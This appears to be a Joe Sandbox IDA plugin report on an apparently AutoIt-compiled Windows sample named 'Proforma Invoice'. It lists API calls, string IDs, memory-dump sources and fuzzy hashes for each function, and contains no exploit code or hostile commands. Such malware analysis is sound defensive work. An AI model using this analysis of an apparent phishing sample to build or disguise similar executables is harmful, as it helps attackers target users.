                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007176F4
                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 0071770B
                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00717746
                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0071775A
                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 0071776B
                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0071779B
                                                                                                • GetStockObject.GDI32(00000011), ref: 007177A6
                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007177B1
                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007177BB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                • API String ID: 2910397461-517079104
                                                                                                • Opcode ID: 45f6683e5187b21220cb8433dcc5d56ad1ee7b20fbb53cceb05f37359725a938
                                                                                                • Instruction ID: 5202cc32d8a4a679a6279e079415b6b4a93e7c0ffbb6990dce887a8b6ff8a672
                                                                                                • Opcode Fuzzy Hash: 45f6683e5187b21220cb8433dcc5d56ad1ee7b20fbb53cceb05f37359725a938
                                                                                                • Instruction Fuzzy Hash: 94A183B1A00615BFEB14DBA4DC4AFAF7B7AEB05710F108124FA15A72E0D7B4AD01CB64
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0070AD1E
                                                                                                • GetDriveTypeW.KERNEL32(?,0072FAC0,?,\\.\,0072F910), ref: 0070ADFB
                                                                                                • SetErrorMode.KERNEL32(00000000,0072FAC0,?,\\.\,0072F910), ref: 0070AF59
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DriveType
                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                • API String ID: 2907320926-4222207086
                                                                                                • Opcode ID: ffca18b4b63f2bbff25693f9c89da16d7fb788cfbdfcabd2e40fbb1b377870ae
                                                                                                • Instruction ID: 7938b5a7b717934398a75ff594d154092173acbe65fde38c2d8e70254a7130f1
                                                                                                • Opcode Fuzzy Hash: ffca18b4b63f2bbff25693f9c89da16d7fb788cfbdfcabd2e40fbb1b377870ae
                                                                                                • Instruction Fuzzy Hash: 4C513FF0644306FBCB90EB20C952CA973E5EB49701F20865AE807B72D1DAB9ED45DB53
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsnicmp
                                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                • API String ID: 1038674560-86951937
                                                                                                • Opcode ID: b2a5accade0b7d54e7a3604a1e519bec70bbaba73832aef11fd035e626688b84
                                                                                                • Instruction ID: ddea0aad7195cb7e085a10a9a732fb489598e927ecfd8f59218527e4df038799
                                                                                                • Opcode Fuzzy Hash: b2a5accade0b7d54e7a3604a1e519bec70bbaba73832aef11fd035e626688b84
                                                                                                • Instruction Fuzzy Hash: 92812EB0700215AADB51BB60EC43FFF376BEF16700F08402DF905AA296E761DD45CA69
                                                                                                APIs
                                                                                                • GetSysColor.USER32(00000012), ref: 0072A903
                                                                                                • SetTextColor.GDI32(?,?), ref: 0072A907
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0072A91D
                                                                                                • GetSysColor.USER32(0000000F), ref: 0072A928
                                                                                                • CreateSolidBrush.GDI32(?), ref: 0072A92D
                                                                                                • GetSysColor.USER32(00000011), ref: 0072A945
                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0072A953
                                                                                                • SelectObject.GDI32(?,00000000), ref: 0072A964
                                                                                                • SetBkColor.GDI32(?,00000000), ref: 0072A96D
                                                                                                • SelectObject.GDI32(?,?), ref: 0072A97A
                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0072A999
                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0072A9B0
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0072A9C5
                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0072A9ED
                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0072AA14
                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0072AA32
                                                                                                • DrawFocusRect.USER32(?,?), ref: 0072AA3D
                                                                                                • GetSysColor.USER32(00000011), ref: 0072AA4B
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0072AA53
                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0072AA67
                                                                                                • SelectObject.GDI32(?,0072A5FA), ref: 0072AA7E
                                                                                                • DeleteObject.GDI32(?), ref: 0072AA89
                                                                                                • SelectObject.GDI32(?,?), ref: 0072AA8F
                                                                                                • DeleteObject.GDI32(?), ref: 0072AA94
                                                                                                • SetTextColor.GDI32(?,?), ref: 0072AA9A
                                                                                                • SetBkColor.GDI32(?,?), ref: 0072AAA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                • String ID:
                                                                                                • API String ID: 1996641542-0
                                                                                                • Opcode ID: af4965b83d83753c1177f50fd3a34d98f600ba4f863e7c9fdac017cc6ee9639d
                                                                                                • Instruction ID: b8b3d5caee70487269ab586e9d4aa3ab40043558455c88d07b443f84d36d72c4
                                                                                                • Opcode Fuzzy Hash: af4965b83d83753c1177f50fd3a34d98f600ba4f863e7c9fdac017cc6ee9639d
                                                                                                • Instruction Fuzzy Hash: 08514C71900218FFDB219FA5DC48EAE7BB9EF08320F118225F911AB2A1D7799951CF94
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00728AC1
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00728AD2
                                                                                                • CharNextW.USER32(0000014E), ref: 00728B01
                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00728B42
                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00728B58
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00728B69
                                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00728B86
                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 00728BD8
                                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00728BEE
                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00728C1F
                                                                                                • _memset.LIBCMT ref: 00728C44
                                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00728C8D
                                                                                                • _memset.LIBCMT ref: 00728CEC
                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00728D16
                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00728D6E
                                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 00728E1B
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00728E3D
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00728E87
                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00728EB4
                                                                                                • DrawMenuBar.USER32(?), ref: 00728EC3
                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 00728EEB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                • String ID: 0
                                                                                                • API String ID: 1073566785-4108050209
                                                                                                • Opcode ID: 22329858aa170a3c5625979ad0559ff893364d5ebabaa71a13fc2110718cd198
                                                                                                • Instruction ID: 9a2e8acfcd884f5a37ae965fac62833ead110ed657ee45fc11f777498ed1fb66
                                                                                                • Opcode Fuzzy Hash: 22329858aa170a3c5625979ad0559ff893364d5ebabaa71a13fc2110718cd198
                                                                                                • Instruction Fuzzy Hash: 49E1B270901228EFDF609F60DC84EEE7BB9EF09710F00815AF915AA290DF799985DF61
                                                                                                APIs
                                                                                                • GetCursorPos.USER32(?), ref: 007249CA
                                                                                                • GetDesktopWindow.USER32 ref: 007249DF
                                                                                                • GetWindowRect.USER32(00000000), ref: 007249E6
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00724A48
                                                                                                • DestroyWindow.USER32(?), ref: 00724A74
                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00724A9D
                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00724ABB
                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00724AE1
                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 00724AF6
                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00724B09
                                                                                                • IsWindowVisible.USER32(?), ref: 00724B29
                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00724B44
                                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00724B58
                                                                                                • GetWindowRect.USER32(?,?), ref: 00724B70
                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00724B96
                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00724BB0
                                                                                                • CopyRect.USER32(?,?), ref: 00724BC7
                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00724C32
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                • String ID: ($0$tooltips_class32
                                                                                                • API String ID: 698492251-4156429822
                                                                                                • Opcode ID: b907decf52b8c3f969f1c6983cd7af97c55963dd1cdf0a75c9be31bc6acec829
                                                                                                • Instruction ID: e51aeaa3370906994a105000933742d2a7fa8f3b43bc9fe3c12b927e33bbdb65
                                                                                                • Opcode Fuzzy Hash: b907decf52b8c3f969f1c6983cd7af97c55963dd1cdf0a75c9be31bc6acec829
                                                                                                • Instruction Fuzzy Hash: 42B18970604350AFDB14DF64D848B6ABBE5FF89310F00892CF5999B2A1D778EC05CBA9
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006A28BC
                                                                                                • GetSystemMetrics.USER32(00000007), ref: 006A28C4
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006A28EF
                                                                                                • GetSystemMetrics.USER32(00000008), ref: 006A28F7
                                                                                                • GetSystemMetrics.USER32(00000004), ref: 006A291C
                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006A2939
                                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006A2949
                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006A297C
                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006A2990
                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 006A29AE
                                                                                                • GetStockObject.GDI32(00000011), ref: 006A29CA
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 006A29D5
                                                                                                  • Part of subcall function 006A2344: GetCursorPos.USER32(?), ref: 006A2357
                                                                                                  • Part of subcall function 006A2344: ScreenToClient.USER32(007657B0,?), ref: 006A2374
                                                                                                  • Part of subcall function 006A2344: GetAsyncKeyState.USER32(00000001), ref: 006A2399
                                                                                                  • Part of subcall function 006A2344: GetAsyncKeyState.USER32(00000002), ref: 006A23A7
                                                                                                • SetTimer.USER32(00000000,00000000,00000028,006A1256), ref: 006A29FC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                • String ID: AutoIt v3 GUI
                                                                                                • API String ID: 1458621304-248962490
                                                                                                • Opcode ID: 219ef749129423cbd80f8e6f53fd2ce9c437d22477810fde5eb8fcf28ede393f
                                                                                                • Instruction ID: aff7cef94fcc7e7baac950ce2aab6713c4aea0b1cdbe2f6ae4cddb9972fc59d0
                                                                                                • Opcode Fuzzy Hash: 219ef749129423cbd80f8e6f53fd2ce9c437d22477810fde5eb8fcf28ede393f
                                                                                                • Instruction Fuzzy Hash: 2DB15E71A4020ADFDB24EF68DC55BAE7BB6FB08310F108129FA1697290DB789C51DF54
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                • String ID: {nl${nl
                                                                                                • API String ID: 884005220-3585178443
                                                                                                • Opcode ID: 9a04c8482ddd19e55a5cc75ab6b5f95af70552e6ea9b24e5ca3943a553636010
                                                                                                • Instruction ID: 78fb4957ef3e1f57426461125df6a7c97eb936d563c17cdee5c69c82602638e9
                                                                                                • Opcode Fuzzy Hash: 9a04c8482ddd19e55a5cc75ab6b5f95af70552e6ea9b24e5ca3943a553636010
                                                                                                • Instruction Fuzzy Hash: 24610672D18715AFDB205FA4D901BB977A6EF01321F29421FE8029B3D1EB789D01C7A6
                                                                                                APIs
                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 006FA47A
                                                                                                • __swprintf.LIBCMT ref: 006FA51B
                                                                                                • _wcscmp.LIBCMT ref: 006FA52E
                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006FA583
                                                                                                • _wcscmp.LIBCMT ref: 006FA5BF
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 006FA5F6
                                                                                                • GetDlgCtrlID.USER32(?), ref: 006FA648
                                                                                                • GetWindowRect.USER32(?,?), ref: 006FA67E
                                                                                                • GetParent.USER32(?), ref: 006FA69C
                                                                                                • ScreenToClient.USER32(00000000), ref: 006FA6A3
                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 006FA71D
                                                                                                • _wcscmp.LIBCMT ref: 006FA731
                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 006FA757
                                                                                                • _wcscmp.LIBCMT ref: 006FA76B
                                                                                                  • Part of subcall function 006C362C: _iswctype.LIBCMT ref: 006C3634
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                • String ID: %s%u
                                                                                                • API String ID: 3744389584-679674701
                                                                                                • Opcode ID: def99122bf0b7b809fa49953b31b904e4739fd91e8d5826e5821c9a5e938d79c
                                                                                                • Instruction ID: 2124827273927772535150f3f2e2c9468af791ccc4e5b531b6ef0b1f38e19999
                                                                                                • Opcode Fuzzy Hash: def99122bf0b7b809fa49953b31b904e4739fd91e8d5826e5821c9a5e938d79c
                                                                                                • Instruction Fuzzy Hash: B1A1A2B520420AABD714EFA0C884FFAB7EAFF44354F008529FA9DD2250D734E955CB92
                                                                                                APIs
                                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 006FAF18
                                                                                                • _wcscmp.LIBCMT ref: 006FAF29
                                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 006FAF51
                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 006FAF6E
                                                                                                • _wcscmp.LIBCMT ref: 006FAF8C
                                                                                                • _wcsstr.LIBCMT ref: 006FAF9D
                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 006FAFD5
                                                                                                • _wcscmp.LIBCMT ref: 006FAFE5
                                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 006FB00C
                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 006FB055
                                                                                                • _wcscmp.LIBCMT ref: 006FB065
                                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 006FB08D
                                                                                                • GetWindowRect.USER32(00000004,?), ref: 006FB0F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                • String ID: @$ThumbnailClass
                                                                                                • API String ID: 1788623398-1539354611
                                                                                                • Opcode ID: d610342013db7b4d771f25e3b383053fc75a45b6ac3fecb8bd978d0c9be65a9f
                                                                                                • Instruction ID: a99aa2e101af6b732cb343159531b5cd51d12493c313e7e3a7eb17a16cf27610
                                                                                                • Opcode Fuzzy Hash: d610342013db7b4d771f25e3b383053fc75a45b6ac3fecb8bd978d0c9be65a9f
                                                                                                • Instruction Fuzzy Hash: 8281C1B10082099BDB14DF10C881FBA77EAEF44314F04846DFE898A291DB34DD49CBA5
                                                                                                APIs
                                                                                                  • Part of subcall function 006A2612: GetWindowLongW.USER32(?,000000EB), ref: 006A2623
                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0072C627
                                                                                                  • Part of subcall function 0072AB37: ClientToScreen.USER32(?,?), ref: 0072AB60
                                                                                                  • Part of subcall function 0072AB37: GetWindowRect.USER32(?,?), ref: 0072ABD6
                                                                                                  • Part of subcall function 0072AB37: PtInRect.USER32(?,?,0072C014), ref: 0072ABE6
                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0072C690
                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0072C69B
                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0072C6BE
                                                                                                • _wcscat.LIBCMT ref: 0072C6EE
                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0072C705
                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0072C71E
                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0072C735
                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0072C757
                                                                                                • DragFinish.SHELL32(?), ref: 0072C75E
                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0072C851
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbv
                                                                                                • API String ID: 169749273-541951504
                                                                                                • Opcode ID: d5a5d7b8991fee1cb3bbe1ae1108d4fbd05ee5d4f3803f9463409f401e46797b
                                                                                                • Instruction ID: edaff27a69a36f671e8ed22347781f2a91aced6b3888ddb3f93ce8907ca6ad75
                                                                                                • Opcode Fuzzy Hash: d5a5d7b8991fee1cb3bbe1ae1108d4fbd05ee5d4f3803f9463409f401e46797b
                                                                                                • Instruction Fuzzy Hash: FA618971108301AFC711EF64DC85DAFBBF9EF99310F00492EF592961A1DB74AA09CB66
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
